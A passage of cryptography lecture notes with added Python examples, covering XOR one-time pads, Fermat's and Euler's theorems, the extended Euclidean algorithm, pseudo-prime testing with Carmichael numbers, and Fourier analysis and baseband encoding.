Sometimes the value gets to 1 earlier.
Lengths of runs are always numbers that divide evenly into 12.
A value of a for which the whole row is needed is called a generator. 2, 6, 7, and 11 are generators.
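An added Python example (not from the slides or from Wagner's book) covering the two preceding topics together: inverses in $Z_p$ by the extended Euclidean algorithm from the "Integers mod p inverse" slide (and why $Z_{10}$, having divisors of zero, gives 2 and 5 no inverse at all), and the Fermat table for p = 13 with its run lengths and generators. Function names are my own; Fermat's theorem also yields the inverse directly as $a^{p-2} \bmod p$, which the code checks against the Euclidean result.

```python
def extended_gcd(a: int, b: int) -> tuple:
    """Return (g, x, y) with x*a + y*b = g = gcd(a, b)."""
    old_r, r = a, b
    old_x, x = 1, 0
    old_y, y = 0, 1
    while r != 0:
        q = old_r // r
        old_r, r = r, old_r - q * r
        old_x, x = x, old_x - q * x
        old_y, y = y, old_y - q * y
    return old_r, old_x, old_y

def inverse_mod(a: int, n: int):
    """Multiplicative inverse of a in Z_n, or None when gcd(a, n) != 1.
    For prime n every non-zero a is invertible; in Z_10, 2, 4, 5, 6 and 8 are not."""
    g, x, _ = extended_gcd(a % n, n)
    if g != 1:
        return None
    return x % n          # x*a = 1 - y*n, so x*a mod n == 1

def is_field_mod(n: int) -> bool:
    """Z_n is a field exactly when every non-zero element has an inverse."""
    return n > 1 and all(inverse_mod(a, n) is not None for a in range(1, n))

def zero_divisors(n: int) -> list:
    """Pairs (a, b), a <= b, of non-zero elements whose product is 0 mod n."""
    return [(a, b) for a in range(1, n) for b in range(a, n) if (a * b) % n == 0]

def power_row(p: int, a: int) -> list:
    """a^1, a^2, ..., a^(p-1) mod p: one row of the Fermat table."""
    return [pow(a, e, p) for e in range(1, p)]

def multiplicative_order(p: int, a: int) -> int:
    """Smallest e >= 1 with a^e mod p == 1: the length of the run on the slide."""
    return power_row(p, a).index(1) + 1

def generators(p: int) -> list:
    """Elements whose whole row is needed before the value returns to 1."""
    return [a for a in range(1, p) if multiplicative_order(p, a) == p - 1]

def fermat_inverse(a: int, p: int) -> int:
    """Fermat: a^(p-1) = 1 mod p, so a * a^(p-2) = 1 and a^(p-2) is the inverse."""
    return pow(a, p - 2, p)

if __name__ == "__main__":
    P = 13
    for a in range(2, P):
        print(P, a, *power_row(P, a), "order", multiplicative_order(P, a))
    print("generators mod 13:", generators(P))
    print("inverses mod 13 (Euclid, Fermat):",
          [(a, inverse_mod(a, P), fermat_inverse(a, P)) for a in range(1, P)])
    print("Z_10 a field?", is_field_mod(10), "zero divisors:", zero_divisors(10))
```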
Summary of topics
In this section, we introduced “Cryptographer’s favorites”
Further study
• The Laws of Cryptography with Java Code: http://www.cs.utsa.edu/~wagner/lawsbookcolor/laws.pdf
Chapter 3
Lecture 3 - Preliminaries
Overheads and notes
You can find all sorts of stuff looking in
http://www.comp.nus.edu.sg/~cs3235/2003-semesterI/
Question box
If you have any questions, feel free to place them in the question box...
Or stick your hand up...
Or...
Last session
• Finish context
• Math preliminaries
  – XOR
  – Logarithms
  – Fields and groups
Recap - exclusive-or
Law XOR-1: The cryptographer’s favorite function is Exclusive-Or.

```text
Message            A        B        C
m               01000001 01000010 01000011 ...
Key = k         00010011 01100101 00111001 ...
K(m) = m ⊕ k    01010010 00100111 01111010 ...
K(m)               R        '        z
```
Exclusive-Or
```text
K(m)               R        '        z
                01010010 00100111 01111010 ...
Key = k         00010011 01100101 00111001 ...
m = K(m) ⊕ k    01000001 01000010 01000011 ...
Message            A        B        C
```
If the bit-stream for the key k is random, and not known to an eavesdropper, then this is the most secure system. It is known as a one-time pad.
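The encryption and decryption tables above, as an added Python example (my code, not the lecture's): the message "ABC" and the 24 key bits are taken from the slide, the helper names are mine. The last function shows why the pad has to be *one-time*: two ciphertexts under the same key XOR to m1 ⊕ m2, with the key cancelled out.

```python
# Added example (not from the notes): XOR as a one-time pad on the slide's data.

def xor_bytes(data: bytes, key: bytes) -> bytes:
    """XOR each data byte with the matching key byte; a pad must be at least as long as the data."""
    if len(key) < len(data):
        raise ValueError("a one-time pad needs at least as many key bytes as message bytes")
    return bytes(d ^ k for d, k in zip(data, key))

def bits(b: bytes) -> str:
    """Render bytes as space-separated 8-bit groups, as the slide does."""
    return " ".join(f"{x:08b}" for x in b)

MESSAGE = b"ABC"                                     # constructed, from the slide
KEY = bytes([0b00010011, 0b01100101, 0b00111001])   # constructed key bits, from the slide

def encrypt(m: bytes = MESSAGE, k: bytes = KEY) -> bytes:
    """K(m) = m XOR k."""
    return xor_bytes(m, k)

def decrypt(c: bytes, k: bytes = KEY) -> bytes:
    """m = K(m) XOR k: the same operation, because k XOR k = 0."""
    return xor_bytes(c, k)

def two_time_pad_leak(m1: bytes, m2: bytes, k: bytes) -> bytes:
    """Reusing the pad: c1 XOR c2 == m1 XOR m2, which no longer depends on k at all."""
    return xor_bytes(xor_bytes(m1, k), xor_bytes(m2, k))

if __name__ == "__main__":
    c = encrypt()
    print(bits(MESSAGE), "->", bits(c), c)        # ... b"R'z"
    print(decrypt(c))                              # b'ABC'
    print(two_time_pad_leak(b"ABC", b"ABD", KEY))  # b'\x00\x00\x07' == b"ABC" XOR b"ABD"
```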
Another diagram
[Diagram: plaintext P passes through the cipher box under key K_i to give the ciphertext K_i[P], and back through the box under K_i to recover the plaintext P.]
(Compare with previous representations).
Logarithms
Law LOG-1: The cryptographer’s favorite logarithm is log base 2.
$y = \log_b x$ is the same as $b^y = x$
$b^{\log_b x} = x$
Logarithm is the inverse of exponential.
Groups
A group is a set of group elements with a binary operation.
Law GROUP-1: The cryptographer’s favorite group is the integers mod n, $Z_n$.
Fields
A field has two operations:
+, with the elements forming a commutative group;
∗, with the elements other than 0 forming another group.
Law FIELD-1: The cryptographer’s favorite field is the integers mod p, denoted $Z_p$, where p is a prime number.
Law FIELD-2: The cryptographer’s other favorite field is $GF(2^n)$.
This session
• Math preliminaries
  – Fermat’s little theorem
  – Euler
Fermat’s theorem
Theorem (Fermat): If p is a prime and a is any non-zero number less than p, then
$a^{p-1} \bmod p = 1$
Fermat’s theorem, p = 13
| p | a | a^1 | a^2 | a^3 | a^4 | a^5 | a^6 | a^7 | a^8 | a^9 | a^10 | a^11 | a^12 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
| 13 | 2 | 2 | 4 | 8 | 3 | 6 | 12 | 11 | 9 | 5 | 10 | 7 | 1 |
| 13 | 3 | 3 | 9 | 1 | 3 | 9 | 1 | 3 | 9 | 1 | 3 | 9 | 1 |
| 13 | 4 | 4 | 3 | 12 | 9 | 10 | 1 | 4 | 3 | 12 | 9 | 10 | 1 |
| 13 | 5 | 5 | 12 | 8 | 1 | 5 | 12 | 8 | 1 | 5 | 12 | 8 | 1 |
| 13 | 6 | 6 | 10 | 8 | 9 | 2 | 12 | 7 | 3 | 5 | 4 | 11 | 1 |
| 13 | 7 | 7 | 10 | 5 | 9 | 11 | 12 | 6 | 3 | 8 | 4 | 2 | 1 |
| 13 | 8 | 8 | 12 | 5 | 1 | 8 | 12 | 5 | 1 | 8 | 12 | 5 | 1 |
| 13 | 9 | 9 | 3 | 1 | 9 | 3 | 1 | 9 | 3 | 1 | 9 | 3 | 1 |
| 13 | 10 | 10 | 9 | 12 | 3 | 4 | 1 | 10 | 9 | 12 | 3 | 4 | 1 |
| 13 | 11 | 11 | 4 | 5 | 3 | 7 | 12 | 2 | 9 | 8 | 10 | 6 | 1 |
| 13 | 12 | 12 | 1 | 12 | 1 | 12 | 1 | 12 | 1 | 12 | 1 | 12 | 1 |
Fermat’s theorem, p = 13
Lengths of runs are always numbers that divide evenly into 12.
A value of a for which the whole row is needed is called a generator. 2, 6, 7, and 11 are generators.
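The p = 13 table and the remarks about run lengths and generators, as an added Python example (my code, not the lecture's; function names are mine): it rebuilds each row, measures where the row first reaches 1, checks that every run length divides p − 1, and lists the generators.

```python
# Added example for the p = 13 slides (not from the notes): rebuild the table of
# a^k mod p, measure each row's run length, and pick out the generators.

def power_row(a: int, p: int) -> list:
    """[a^1 mod p, a^2 mod p, ..., a^(p-1) mod p]: one row of the slide's table."""
    row, v = [], 1
    for _ in range(p - 1):
        v = (v * a) % p          # reduce after every step; a^k itself is never formed
        row.append(v)
    return row

def run_length(a: int, p: int) -> int:
    """Smallest k >= 1 with a^k mod p == 1, i.e. the length of the repeating run."""
    row = power_row(a, p)
    return row.index(1) + 1      # for prime p Fermat guarantees a 1 by position p-1

def fermat_holds(a: int, p: int) -> bool:
    """a^(p-1) mod p == 1, the statement of Fermat's little theorem."""
    return pow(a, p - 1, p) == 1

def generators(p: int) -> list:
    """Bases whose run needs the whole row (length p-1): the generators."""
    return [a for a in range(1, p) if run_length(a, p) == p - 1]

def fermat_table(p: int) -> dict:
    """{a: power_row(a, p)} for a = 2 .. p-1, the slide's table as data."""
    return {a: power_row(a, p) for a in range(2, p)}

if __name__ == "__main__":
    for a, row in fermat_table(13).items():
        print(f"a={a:2d}:", " ".join(f"{v:2d}" for v in row),
              f"  run length {run_length(a, 13)}")
    print("generators mod 13:", generators(13))    # [2, 6, 7, 11]
```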
An interesting observation..
Because a to a power mod p always starts repeating after the power reaches p − 1, you can do this:
$a^x \bmod p = a^{x \bmod (p-1)} \bmod p$
Thus modulo p in the expression requires modulo p − 1 in the exponent. For p = 13 as above,
$a^{29} \bmod 13 = a^{29 \bmod 12} \bmod 13 = a^5 \bmod 13$
Another example
result $= 7^{1215} \bmod 13$
Another example
result = $7^{1215} \bmod 13$, where $7^{1215}$ written out in full (bc output) is

```text
62247027506732273704655645590797926890623986483292191309020787710924
86991072740587065198907810173838994978267934813009677708927826601313
55777365361484044783800851222817392261341421370762400507026834564501
61478881858016233581815507729190060733863810985820998417753776670372
86814739670120315712396914000184822340352355906455155667534102473964
53541377412583676260706359331048403293779053704648771069764131865422
62299505280557584280574185802694213299802280179325494560628948940739
34448228464915119714116869895958794732024285742690180232449402567101
05083114967356334295809219455711191131246974627173111242792554453321
16504914530077241996189357298508605206780120789880835525222341940514
58556732086842042388893209157040799864871901064991230860288657545878
54838031902109935110264503891544145872580747830622294066978047059698
08888224976779404912792017633095411318555938776800816778624695807909\
49705787192596277127796303487781814106147375370904627195995589087276
8469943
```

and that number mod 13 = 5.
How did I work that out?
I used bc, an arbitrary precision calculator language.
Another example
result $= 7^{1215} \bmod 13$
$= 7^{1215 \bmod 12} \bmod 13$
$= 7^{3} \bmod 13$
$= 343 \bmod 13$
$= 5$
Summary
We can do BIG NUMBER maths without calculating big numbers.
This session
• Math preliminaries
  – Fermat’s little theorem
  – Euler
Euler
The Swiss mathematician Leonhard Euler (1707-1783) discovered a generalization of Fermat’s Theorem which will later be useful in the discussion of the RSA cryptosystem.
Euler’s theorem
Theorem (Euler): If n is any positive integer and a is any positive integer less than n with no divisors in common with n, then
$a^{\phi(n)} \bmod n = 1,$
where $\phi(n)$ is the Euler phi function:
$\phi(n) = n(1 - 1/p_1) \cdots (1 - 1/p_m),$
and $p_1, \ldots, p_m$ are all the prime numbers that divide evenly into n, including n itself in case it is a prime.
Special case 1
If n is a prime, then using the formula,
$\phi(n) = n(1 - 1/n) = n \cdot \frac{n-1}{n} = n - 1$
Fermat’s result is a special case of Euler’s.
$a^{\phi(n)} \bmod n = a^{n-1} \bmod n = 1$
Special case 2
Another special case needed for RSA comes when the modulus is a product of two primes: n = pq. Then
$\phi(n) = n(1 - 1/p)(1 - 1/q) = (p - 1)(q - 1)$
Special case 2
$a^{(p-1)(q-1)} \bmod pq = 1$
• assuming a has no divisors in common with pq
• and p and q are primes
Euler: n = 15 and $\phi(n) = 8$

| a | a^1 | a^2 | a^3 | a^4 | a^5 | a^6 | a^7 | a^8 | a^9 | a^10 | a^11 | a^12 | a^13 | a^14 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
| 2 | 2 | 4 | 8 | 1 | 2 | 4 | 8 | 1 | 2 | 4 | 8 | 1 | 2 | 4 |
| 3 | 3 | 9 | 12 | 6 | 3 | 9 | 12 | 6 | 3 | 9 | 12 | 6 | 3 | 9 |
| 4 | 4 | 1 | 4 | 1 | 4 | 1 | 4 | 1 | 4 | 1 | 4 | 1 | 4 | 1 |
| 5 | 5 | 10 | 5 | 10 | 5 | 10 | 5 | 10 | 5 | 10 | 5 | 10 | 5 | 10 |
| 6 | 6 | 6 | 6 | 6 | 6 | 6 | 6 | 6 | 6 | 6 | 6 | 6 | 6 | 6 |
| 7 | 7 | 4 | 13 | 1 | 7 | 4 | 13 | 1 | 7 | 4 | 13 | 1 | 7 | 4 |
| 8 | 8 | 4 | 2 | 1 | 8 | 4 | 2 | 1 | 8 | 4 | 2 | 1 | 8 | 4 |
| 9 | 9 | 6 | 9 | 6 | 9 | 6 | 9 | 6 | 9 | 6 | 9 | 6 | 9 | 6 |
| 10 | 10 | 10 | 10 | 10 | 10 | 10 | 10 | 10 | 10 | 10 | 10 | 10 | 10 | 10 |
| 11 | 11 | 1 | 11 | 1 | 11 | 1 | 11 | 1 | 11 | 1 | 11 | 1 | 11 | 1 |
| 12 | 12 | 9 | 3 | 6 | 12 | 9 | 3 | 6 | 12 | 9 | 3 | 6 | 12 | 9 |
| 13 | 13 | 4 | 7 | 1 | 13 | 4 | 7 | 1 | 13 | 4 | 7 | 1 | 13 | 4 |
| 14 | 14 | 1 | 14 | 1 | 14 | 1 | 14 | 1 | 14 | 1 | 14 | 1 | 14 | 1 |
Table
The table illustrates Euler’s theorem for n = 15 = 3 · 5, with
$\phi(15) = 15 \cdot (1 - 1/3) \cdot (1 - 1/5) = (3 - 1) \cdot (5 - 1) = 8$
Notice here that a 1 is reached when the power is 8, but only for numbers with no divisors in common with 15.
For other base numbers, the value never gets to 1.
Euler
Arithmetic in the exponent is taken mod $\phi(n)$, so that, if a has no divisors in common with n,
$a^x \bmod n = a^{x \bmod \phi(n)} \bmod n.$
If n = 15 as above, then $\phi(n) = 8$, and if neither 3 nor 5 divides evenly into a, then $a^x \bmod 15 = a^{x \bmod 8} \bmod 15$. Thus for example,
$a^{28} \bmod 15 = a^{28 \bmod 8} \bmod 15 = a^4 \bmod 15.$
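The exponent-reduction trick from the Fermat slides (p = 13, including $7^{1215} \bmod 13 = 5$) and its Euler generalisation on this slide (n = 15), as one added Python example (my code, not the lecture's; function names are mine). It computes $\phi(n)$ from the product formula in integer arithmetic, checks which bases satisfy Euler's theorem for n = 15, and refuses to reduce the exponent when gcd(a, n) ≠ 1, which is the case the table shows never reaching 1.

```python
# Added example (not from the notes): Euler's phi, Euler's theorem, and reducing
# the exponent mod phi(n) so that big powers are never formed.
from math import gcd

def distinct_prime_factors(n: int) -> list:
    """Sorted distinct primes dividing n, by trial division (fine for classroom-sized n)."""
    factors, p = [], 2
    while p * p <= n:
        if n % p == 0:
            factors.append(p)
            while n % p == 0:
                n //= p
        p += 1
    if n > 1:
        factors.append(n)
    return factors

def phi(n: int) -> int:
    """Slide's formula n * prod(1 - 1/p), evaluated as n // p * (p - 1) so it stays an integer."""
    result = n
    for p in distinct_prime_factors(n):
        result = result // p * (p - 1)
    return result

def euler_holds(a: int, n: int) -> bool:
    """a^phi(n) mod n == 1 (true exactly when gcd(a, n) == 1)."""
    return pow(a, phi(n), n) == 1

def bases_reaching_one(n: int) -> set:
    """All 1 <= a < n whose row in the table reaches 1 at power phi(n)."""
    return {a for a in range(1, n) if euler_holds(a, n)}

def reduce_exponent(a: int, x: int, n: int) -> int:
    """a^x mod n via a^(x mod phi(n)) mod n. Only valid when a has no divisors in common with n."""
    if gcd(a, n) != 1:
        raise ValueError(f"gcd({a}, {n}) != 1: the exponent cannot be reduced mod phi(n)")
    return pow(a, x % phi(n), n)

if __name__ == "__main__":
    print(phi(13), phi(15), phi(29 * 37))             # 12 8 1008
    print(sorted(bases_reaching_one(15)))             # [1, 2, 4, 7, 8, 11, 13, 14]
    print(1215 % 12, reduce_exponent(7, 1215, 13))    # 3 5  (7^3 = 343, 343 mod 13 = 5)
    print(pow(3, 8, 15))                              # 6, never 1: 3 shares a factor with 15
```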
Before we leave Euler...
We are interested in...
• Large prime numbers (p, q)
• Their product n = pq
• The Euler phi function $\phi(n) = (p - 1)(q - 1)$
Before we leave Euler...
In a similar fashion to before we can do BIG number arithmetic easily.
Consider also the ease of multiplying, and the difficulty of factoring...
Before we leave Euler...
29 · 37 = ?
The Euclidean algorithm
The multiplicative inverse is not intuitive and requires some theory to compute.
$a^{-1}$ can be computed efficiently using the extended Euclidean algorithm.
Law GCD-1: The cryptographer’s first and oldest favorite algorithm is the extended Euclidean algorithm, which computes the greatest common divisor of two positive integers a and b and also supplies integers x and y such that $x \cdot a + y \cdot b = \gcd(a, b)$.
Finding GCD
• For the gcd of 819 and 462,
  – factor the numbers as:
    ∗ 819 = 3 · 3 · 7 · 13
    ∗ 462 = 2 · 3 · 7 · 11
  – gcd is 21 = 3 · 7
But there is no efficient algorithm to factor integers.
The Euclidean algorithm
1. Repeatedly divide the larger one by the smaller, and
2. Write larger = smaller · quotient + remainder
3. Repeat using the two numbers “smaller” and “remainder”.
4. When you get a 0 remainder, then you have the gcd of the original two numbers.
Example
819 = 462 · 1 + 357 (Step 0)
462 = 357 · 1 + 105 (Step 1)
357 = 105 · 3 + 42 (Step 2)
105 = 42 · 2 + 21 (Step 3, so GCD = 21)
42 = 21 · 2 + 0 (Step 4)
The extended Euclidean algorithm
Given the two positive integers 819 and 462, the extended Euclidean algorithm finds integers a and b so that
$a \cdot 819 + b \cdot 462 = \gcd(819, 462) = 21$
In this case, $(-9) \cdot 819 + 16 \cdot 462 = 21$
(See notes...)
How does this give us a mechanism to calculate the multiplicative inverse of an element?
The extended Euclidean algorithm
$x \cdot a + y \cdot p = \gcd(x, y)$
Now - if p is a prime, then $\gcd(x, y) = 1$, and so
$x \cdot a + y \cdot p = 1$
In the field $Z_p$, this indicates that $x \cdot a = 1$, and so $x = a^{-1}$.
The extended Euclidean algorithm has given us a mechanism to calculate the multiplicative inverse of an element.
Fast integer exponentiation
Law EXP-1: Many cryptosystems in modern cryptography depend on a fast algorithm to perform integer exponentiation.
Examples in notes... not so important, just nice to know it can be done.
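The notes leave the fast algorithm to the written material; as an added Python example (my code, not the lecture's), here is right-to-left square-and-multiply with a multiplication counter beside the naive repeated-multiply loop, so the gap on the slide's own $7^{1215} \bmod 13$ is visible: about $2 \log_2 1215$ multiplications instead of 1214, and no intermediate value ever exceeds $(\text{mod}-1)^2$.

```python
# Added example (not from the notes): square-and-multiply modular exponentiation.

def powmod_fast(base: int, exp: int, mod: int) -> tuple:
    """(base^exp mod mod, number of modular multiplications used)."""
    if mod == 1:
        return 0, 0
    result, mults = 1, 0
    base %= mod
    while exp > 0:
        if exp & 1:                       # this bit of the exponent is set
            result = result * base % mod
            mults += 1
        exp >>= 1
        if exp:                           # square only while bits remain
            base = base * base % mod
            mults += 1
    return result, mults

def powmod_naive(base: int, exp: int, mod: int) -> tuple:
    """Same result by exp-1 repeated multiplications (only feasible for small exp)."""
    result, mults = base % mod, 0
    for _ in range(exp - 1):
        result = result * base % mod
        mults += 1
    return result, mults

if __name__ == "__main__":
    print(powmod_fast(7, 1215, 13))   # (5, 18): 8 set bits + 10 squarings
    print(powmod_naive(7, 1215, 13))  # (5, 1214)
```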
Back to primes
For 2500 years mathematicians studied prime numbers just because they were interesting, without any idea they would have practical applications. Possible real-world uses:
1. Sometimes... a prime number of ball bearings arranged in a bearing, to cut down on periodic wear (also gear teeth).
2. Possibly... the 13 and 17-year periodic emergence of cicadas may be due to coevolution with predators (that lost and became extinct).
Since 1976
Now finally, in cryptography, prime numbers have come into their own.
Law PRIME-1: A source of large random prime integers is an essential part of many current cryptosystems.
Checking for primes
It is hard to check that an integer is “certainly” prime, but...
It is easy to check that an integer is “probably” prime.
Tests to check if a number is probably prime are called pseudo-prime tests.
Prime check
Start with a property of a prime number, such as Fermat’s Theorem, mentioned in the previous chapter:
if p is a prime and a is any non-zero number less than p, then $a^{p-1} \bmod p = 1$.
If one can find a number a for which Fermat’s Theorem does not hold, then the number p in the theorem is definitely not a prime.
If the theorem holds, then p is called a pseudo-prime with respect to a, and it might actually be a prime.
Prime check
So the simplest possible pseudo-prime test would just take a small value of a, say 2 or 3, and check if Fermat’s Theorem is true.
Simple Pseudo-prime Test: If a very large random integer p (100 decimal digits or more) is not divisible by a small prime, and if $3^{p-1} \bmod p = 1$, then the number is prime except for a vanishingly small probability, which one can ignore.
Prime check - 1105,1729
One could just repeat the test for other integers besides 3 as the base, but unfortunately there are non-primes (called Carmichael numbers) that satisfy Fermat’s theorem for all values of a even though they are not prime.
Chances of a mistake less than $10^{-41}$; in practice use better tests.
Law PRIME-2: Just one simple pseudo-prime test is enough to test that a very large random integer is probably prime.
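The Simple Pseudo-prime Test of the previous slide and the Carmichael numbers 1105 and 1729 named in this slide's title, as an added Python example (my code, not the lecture's; names are mine). It shows the failure mode: 1105 and 1729 pass Fermat's condition for every base coprime to them, so repeating the Fermat check with other bases cannot reject them; they are only rejected here because the slide's test trial-divides by small primes first.

```python
# Added example (not from the notes): the slide's pseudo-prime test and the
# Carmichael numbers that defeat a base-only Fermat check.
from math import gcd

SMALL_PRIMES = [2, 3, 5, 7, 11, 13, 17, 19, 23, 29, 31, 37, 41, 43, 47]  # constructed cut-off

def fermat_holds(n: int, a: int) -> bool:
    """a^(n-1) mod n == 1: n is then a pseudo-prime with respect to a."""
    return pow(a, n - 1, n) == 1

def simple_pseudo_prime_test(n: int, base: int = 3) -> bool:
    """The slide's test: not divisible by a small prime, and 3^(n-1) mod n == 1."""
    if n < 2:
        return False
    for p in SMALL_PRIMES:
        if n == p:
            return True
        if n % p == 0:
            return False
    return fermat_holds(n, base)

def is_prime_exact(n: int) -> bool:
    """Trial division up to sqrt(n): the slow 'certainly' check, used here only for small n."""
    if n < 2:
        return False
    i = 2
    while i * i <= n:
        if n % i == 0:
            return False
        i += 1
    return True

def is_carmichael(n: int) -> bool:
    """Composite n for which Fermat's condition holds for every base a coprime to n."""
    if n < 3 or is_prime_exact(n):
        return False
    return all(fermat_holds(n, a) for a in range(2, n) if gcd(a, n) == 1)

def carmichael_numbers_below(limit: int) -> list:
    """All Carmichael numbers below limit (they are all odd)."""
    return [n for n in range(3, limit, 2) if is_carmichael(n)]

if __name__ == "__main__":
    print(carmichael_numbers_below(2000))                       # [561, 1105, 1729]
    print(fermat_holds(1105, 3), fermat_holds(1729, 3))         # True True: Fermat alone is fooled
    print(simple_pseudo_prime_test(1105), simple_pseudo_prime_test(1729))  # False False
    print(simple_pseudo_prime_test(2**61 - 1))                  # True (a Mersenne prime)
```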
Summary of topics
We can do BIG arithmetic in these fields
We can do fast exponentiation and modulo arithmetic
We can check for primes
Chapter 4
Lecture 4 - Preliminaries
Chocolate fish people
Andreas Schuth
Chong Jun Yong
Ashley Ng *
Wu Yongzheng *
Zhang Huaixing *
Terence Sangeet
The extended Euclidean algorithm
$x \cdot a + y \cdot p = \gcd(x, y)$
Now - if p is a prime, then $\gcd(x, y) = 1$, and so
$x \cdot a + y \cdot p = 1$
WRONG!
The extended Euclidean algorithm
$x \cdot a + y \cdot p = \gcd(a, p)$
Now - if p is a prime, then $\gcd(a, p) = 1$, and so
$x \cdot a + y \cdot p = 1$
RIGHT!
Last session
• Math preliminaries
  – Fermat’s little theorem
  – Euler
This session
• Physical preliminaries
• Entropy
Preliminaries - physical
Consider:
• Is the data analog or digital?
• What limits are placed on it?
• How is it to be transmitted?
• How can you be sure that it is correct/accurate?
Analog and digital
[Plot: amplitude versus time, x from -10 to 10. Curves: the analog signal sin(x)+4, the digital signal (sin(x)>=0)+1, and real(int(sin(x)*5))/10]
The plot is amplitude versus time.
Analog and digital
The repetition rate (if it repeats) is called the frequency, and is measured in Hertz.
The peak to peak signal level is called the amplitude.
The simplest analog signal is called the sine wave.
By mixing we may create any desired periodic waveform.
Analog and digital
[Plot: amplitude versus time, x from -10 to 10. Curves: sin(x)+4, (sin(3*x)/3)+2, and their sum sin(x)+(sin(3*x)/3)]
The plot is amplitude versus time. (Time domain)
Analog and digital
[Plot: amplitude versus frequency, with components of amplitude 1.0 at f, 0.333 at 3f and 0.2 at 5f]
The plot is amplitude vs frequency. (Frequency domain).
Analog and digital
If we were to continue in the same progression, the resultant waveform would be a square wave:

$$\sum_{n=1}^{\infty} \frac{1}{n}\sin(2\pi n f) \quad (\text{for odd } n) \;\Rightarrow\; \text{square wave, frequency } f$$

This representation method is known as Fourier Analysis after Jean-Baptiste Fourier.
Fourier analysis
$$\frac{4}{\pi}\left(\sin(2\pi f t) + \frac{1}{3}\sin(6\pi f t) + \frac{1}{5}\sin(10\pi f t) + \frac{1}{7}\sin(14\pi f t) + \ldots\right)$$

[Plot: amplitude versus time, x from -10 to 10, showing the successive partial sums sin(x)+10, sin(x)+(sin(3*x)/3)+8, sin(x)+(sin(3*x)/3)+(sin(5*x)/5)+6 and sin(x)+(sin(3*x)/3)+(sin(5*x)/5)+(sin(7*x)/7)+4, each offset vertically]
Fourier analysis
Transformation between equivalent time domain and frequency domain representations.
A piecewise continuously differentiable periodic function in the time domain may be transformed to a discrete aperiodic function in the frequency domain.
smooth, repeating ↔ pointy, not repeating
f(t) ↔ F(ω)
Fourier analysis
| Time domain | | Frequency domain | Description |
|---|---|---|---|
| Continuous, periodic | ↔ | Discrete, aperiodic | Fourier series |
| Continuous, aperiodic | ↔ | Continuous, aperiodic | Fourier transform |
| Discrete, periodic | ↔ | Discrete, periodic | Discrete Fourier series |
| Discrete, aperiodic | ↔ | Continuous, periodic | Discrete Fourier transform |
Accuracy
There is a relationship between the bandwidth of a channel and how accurate a signal is.
Another way of stating this is to point out that the higher frequency components are important: they are needed to re-create the original signal faithfully. If we had two 1,000 Hz signals, one a triangle wave and one a square wave, and they were both passed through the 1,000 Hz bandwidth-limited channel above, they would look identical (a sine wave).
Example transforms
[Figure: four example transform pairs, each showing a time-domain function f(t) plotted against t beside its frequency-domain transform F(ω) plotted against ω]
Convolution
The Fourier transform of the convolution f(t) ∗ g(t) is the product of the Fourier transforms of the functions F(ω) and G(ω), and vice versa.

$$f(t) * g(t) \leftrightarrow F(\omega) \times G(\omega)$$
$$f(t) \times g(t) \leftrightarrow F(\omega) * G(\omega)$$

We can use convolution to easily predict the functions that result from complex signal filtering or sampling.
Convolution
[Figure: f(t) and g(t) in the time domain (against t) with their transforms F(ω) and G(ω) in the frequency domain (against ω); the product f(t).g(t) has transform F(ω) * G(ω)]
Modulation
A baseband signal is one in which the data is directly converted to a signal and transmitted. When the signal is imposed on another signal, the process is called modulation.
We may modulate for several reasons:
• The media may not support the baseband signal
• We may wish to use a single transmission medium to transport many signals
Modulation methods
• Frequency modulation - frequency shift keying (FSK)
• Amplitude modulation
• Phase modulation - phase shift keying (PSK)
• Combinations of the above (QAM)
Baseband digital encoding
The simplest encoding scheme is just to use a low level for a zero bit, and a high level for a one bit. As long as both ends of a channel are synchronized in some manner, we can transfer data.
On the other hand, if the ends of the channel are not synchronized we might use a simple encoding scheme, such as Bipolar or Manchester encoding, to transfer synchronizing (clock) information on the same channel.
Baseband digital encoding
[Figure: two timing diagrams, Bipolar and Manchester, each showing the BITS, TIME, CODE, CLOCK and RECVD traces]
In Bipolar encoding, a 1 is transmitted with a positive pulse, a 0 with a negative pulse. Sometimes called return to zero encoding.
In Manchester encoding, there is a transition in the center of each bit cell.
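The two clocked encodings described above, as an added Python example that is not part of the lecture notes. The level convention chosen for Manchester (0 as high-then-low, 1 as low-then-high) is an assumption; the decoders show the property the slides give as the reason for these codes, namely that a receiver can check every bit cell for the transition that carries the clock and so notice when it has lost synchronisation, which the plain low/high scheme cannot offer on a long run of equal bits.

```python
def manchester_encode(bits):
    """Each bit cell becomes two half-cells with a transition in the middle.
    Convention assumed here (as in IEEE 802.3): 0 -> high then low, 1 -> low then high."""
    levels = []
    for b in bits:
        if b not in (0, 1):
            raise ValueError("bits must be 0 or 1")
        levels.extend((1, 0) if b == 0 else (0, 1))
    return levels


def has_clock(levels):
    """True when every bit cell has the mid-cell transition the receiver recovers its clock from."""
    if len(levels) % 2:
        return False
    return all(levels[i] != levels[i + 1] for i in range(0, len(levels), 2))


def manchester_decode(levels):
    """Recover the bits; a cell without a transition means the receiver has lost sync."""
    if not has_clock(levels):
        raise ValueError("missing mid-cell transition: receiver lost synchronisation")
    return [0 if levels[i] == 1 else 1 for i in range(0, len(levels), 2)]


def bipolar_rz_encode(bits):
    """Bipolar return-to-zero: 1 -> positive pulse, 0 -> negative pulse, each followed
    by a return to the zero level in the second half of the cell."""
    levels = []
    for b in bits:
        if b not in (0, 1):
            raise ValueError("bits must be 0 or 1")
        levels.extend((1, 0) if b == 1 else (-1, 0))
    return levels


def bipolar_rz_decode(levels):
    """The return to zero in every cell is what carries the clock here."""
    if len(levels) % 2:
        raise ValueError("incomplete bit cell")
    bits = []
    for i in range(0, len(levels), 2):
        pulse, rest = levels[i], levels[i + 1]
        if pulse == 0 or rest != 0:
            raise ValueError(f"cell {i // 2} has no pulse-then-zero pattern: lost synchronisation")
        bits.append(1 if pulse > 0 else 0)
    return bits


def nrz_encode(bits):
    """The simplest scheme from the slide: low for 0, high for 1, one level per cell.
    A run of equal bits gives no transitions, so the receiver must already be synchronised."""
    return list(bits)


def transitions(levels):
    """Count level changes; NRZ on a run of identical bits gives 0, the clocked codes never do."""
    return sum(1 for a, b in zip(levels, levels[1:]) if a != b)


if __name__ == "__main__":
    data = [1, 0, 1, 1, 0, 0, 0, 1]
    print("manchester:", manchester_encode(data), "->", manchester_decode(manchester_encode(data)))
    print("bipolar RZ:", bipolar_rz_encode(data), "->", bipolar_rz_decode(bipolar_rz_encode(data)))
    print("NRZ transitions on eight 1s:", transitions(nrz_encode([1] * 8)))
```

Each half-cell is represented as a level in a list, so a sampled waveform captured at twice the bit rate can be fed straight to the decoders.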
Summary
